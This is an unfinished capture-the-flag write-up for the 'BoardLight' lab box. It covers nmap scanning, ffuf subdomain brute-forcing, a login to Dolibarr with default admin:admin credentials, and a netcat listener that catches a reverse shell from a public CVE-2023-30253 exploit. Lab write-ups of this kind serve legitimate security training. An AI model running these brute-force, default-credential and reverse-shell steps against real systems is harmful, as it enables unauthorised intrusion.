Enumeration

nmap

First we enumerate with nmap.

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDH0dV4gtJNo8ixEEBDxhUId6Pc/8iNLX16+zpUCIgmxxl5TivDMLg2JvXorp4F2r8ci44CESUlnMHRSYNtlLttiIZHpTML7ktFHbNexvOAJqE1lIlQlGjWBU1hWq6Y6n1tuUANOd5U+Yc0/h53gKu5nXTQTy1c9CLbQfaYvFjnzrR3NQ6Hw7ih5u3mEjJngP+Sq+dpzUcnFe1BekvBPrxdAJwN6w+MSpGFyQSAkUthrOE4JRnpa6jSsTjXODDjioNkp2NLkKa73Yc2DHk3evNUXfa+P8oWFBk8ZXSHFyeOoNkcqkPCrkevB71NdFtn3Fd/Ar07co0ygw90Vb2q34cu1Jo/1oPV1UFsvcwaKJuxBKozH+VA0F9hyriPKjsvTRCbkFjweLxCib5phagHu6K5KEYC+VmWbCUnWyvYZauJ1/t5xQqqi9UWssRjbE1mI0Krq2Zb97qnONhzcclAPVpvEVdCCcl0rYZjQt6VI1PzHha56JepZCFCNvX3FVxYzEk=
|   256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK7G5PgPkbp1awVqM5uOpMJ/xVrNirmwIT21bMG/+jihUY8rOXxSbidRfC9KgvSDC4flMsPZUrWziSuBDJAra5g=
|   256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILHj/lr3X40pR3k9+uYJk4oSjdULCK0DlOxbiL66ZRWg
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.41 (Ubuntu)

port 80

There are only 2 ports open and there isn’t anonymous login on SSH so we proceed to check the web app on port 80. Nothing much on the main page.

view source

CTRL-U to check the source and we see a portfolio.php commented out but it doesn’t lead us anywhere.

email address `([email protected])`

We see an email address [email protected] at the bottom on the main page though so I guess that’s worth noting.

subdomain bruteforcing

With nothing much on the website, we try to do some further enumeration. In this case I’ll try to bruteforce any subdomains.

I am using board.htb as the domain as per the email address we found earlier.

I am using ffuf as I’ve found it to be quite a reliable enumerator of directories and subdomains. I’ve also discovered some LFIs with it.

ffuf -u http://10.10.11.11 -H 'Host: FUZZ.board.htb' -w /usr/share/seclists/Discovery/DNS/subdomain-top1million-20000.txt -ac

Nice! We find a new subdomain crm so we add that as well as board.htb to the /etc/hosts file.

crm.board.htb

Back to the browser to check crm.board.htb and we find a login page running an open source CRM software called Dolibarr.

Foothold

Dolibarr

default credentials

Some simple research gave me the default creds for Dolibarr which actually works on this box. admin:admin

vulnerable version

Upon login, we see that the version is 17.0.0 so we immediately search for a CVE/exploit.

POC Exploit

There really is a POC exploit (CVE-2023-30253) for Dolibarr 17.0.0.

Very simple exploit. First, we clone the repo.

git clone https://github.com/nikn0laty/Exploit-for-Dolibarr-17.0.0-CVE-2023-30253.git

And then we run a nc listener.

nc -lvnp 8888

After that we run the exploit and we get a shell as www-data.

python3 exploit.py http://crm.board.htb admin admin 10.10.14.5 8888

abandoned.. followed writeup https://0xdf.gitlab.io/2024/09/28/htb-boardlight.html

Enumeration#

nmap#

port 80#

view source#

email address ([email protected])#

subdomain bruteforcing#

crm.board.htb#

Foothold#

Dolibarr#

default credentials#

vulnerable version#

POC Exploit#